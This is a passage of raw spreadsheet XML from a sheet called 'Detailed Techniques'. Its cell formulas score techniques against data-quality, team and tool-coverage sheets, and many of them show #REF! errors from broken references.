        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q26" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R26" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S26" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T26" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U26" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V26" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W26" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X26" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F26&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F26))-LEN(SUBSTITUTE(TRIM(F26),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y26" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="27" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A27" s="8" t="s">
        <v>96</v>
      </c>
      <c r="B27" s="8" t="s">
        <v>9</v>
      </c>
      <c r="C27" s="8" t="s">
        <v>393</v>
      </c>
      <c r="D27" s="10" t="s">
        <v>394</v>
      </c>
      <c r="E27" s="10" t="s">
        <v>395</v>
      </c>
      <c r="F27" s="10" t="s">
        <v>396</v>
      </c>
      <c r="G27" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K27,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H27" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I27" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J27" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K27" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L27" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M27" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N27" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O27" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P27" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q27" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R27" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S27" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T27" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U27" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V27" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W27" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X27" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F27&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F27))-LEN(SUBSTITUTE(TRIM(F27),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y27" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="28" spans="1:25" ht="99.75" x14ac:dyDescent="0.45">
      <c r="A28" s="8" t="s">
        <v>207</v>
      </c>
      <c r="B28" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C28" s="8" t="s">
        <v>397</v>
      </c>
      <c r="D28" s="10" t="s">
        <v>398</v>
      </c>
      <c r="E28" s="10" t="s">
        <v>399</v>
      </c>
      <c r="F28" s="10" t="s">
        <v>400</v>
      </c>
      <c r="G28" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K28,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H28" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I28" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J28" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K28" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L28" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M28" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N28" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O28" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P28" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q28" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R28" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S28" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T28" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U28" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V28" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W28" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X28" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F28&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F28))-LEN(SUBSTITUTE(TRIM(F28),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y28" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="29" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A29" s="8" t="s">
        <v>139</v>
      </c>
      <c r="B29" s="8" t="s">
        <v>401</v>
      </c>
      <c r="C29" s="8" t="s">
        <v>402</v>
      </c>
      <c r="D29" s="10" t="s">
        <v>403</v>
      </c>
      <c r="E29" s="10" t="s">
        <v>404</v>
      </c>
      <c r="F29" s="10" t="s">
        <v>405</v>
      </c>
      <c r="G29" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K29,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H29" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I29" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J29" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K29" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L29" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M29" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N29" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O29" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P29" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q29" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R29" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S29" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T29" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U29" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V29" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W29" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X29" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F29&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F29))-LEN(SUBSTITUTE(TRIM(F29),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y29" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="30" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A30" s="8" t="s">
        <v>95</v>
      </c>
      <c r="B30" s="8" t="s">
        <v>8</v>
      </c>
      <c r="C30" s="8" t="s">
        <v>406</v>
      </c>
      <c r="D30" s="10" t="s">
        <v>407</v>
      </c>
      <c r="E30" s="10" t="s">
        <v>408</v>
      </c>
      <c r="F30" s="10" t="s">
        <v>409</v>
      </c>
      <c r="G30" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K30,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H30" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I30" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J30" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K30" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L30" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M30" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N30" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O30" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P30" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q30" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R30" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S30" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T30" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U30" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V30" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W30" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X30" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F30&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F30))-LEN(SUBSTITUTE(TRIM(F30),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y30" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="31" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A31" s="8" t="s">
        <v>46</v>
      </c>
      <c r="B31" s="8" t="s">
        <v>8</v>
      </c>
      <c r="C31" s="8" t="s">
        <v>410</v>
      </c>
      <c r="D31" s="10" t="s">
        <v>411</v>
      </c>
      <c r="E31" s="10" t="s">
        <v>412</v>
      </c>
      <c r="F31" s="10" t="s">
        <v>413</v>
      </c>
      <c r="G31" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K31,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H31" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I31" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J31" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K31" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L31" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M31" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N31" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O31" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P31" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q31" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R31" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S31" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T31" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U31" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V31" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W31" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X31" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F31&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F31))-LEN(SUBSTITUTE(TRIM(F31),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y31" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="32" spans="1:25" ht="299.25" x14ac:dyDescent="0.45">
      <c r="A32" s="8" t="s">
        <v>183</v>
      </c>
      <c r="B32" s="8" t="s">
        <v>0</v>
      </c>
      <c r="C32" s="8" t="s">
        <v>414</v>
      </c>
      <c r="D32" s="10" t="s">
        <v>415</v>
      </c>
      <c r="E32" s="10" t="s">
        <v>416</v>
      </c>
      <c r="F32" s="10" t="s">
        <v>417</v>
      </c>
      <c r="G32" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K32,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H32" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I32" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F32&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F32))-LEN(SUBSTITUTE(TRIM(F32),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J32" s="51">
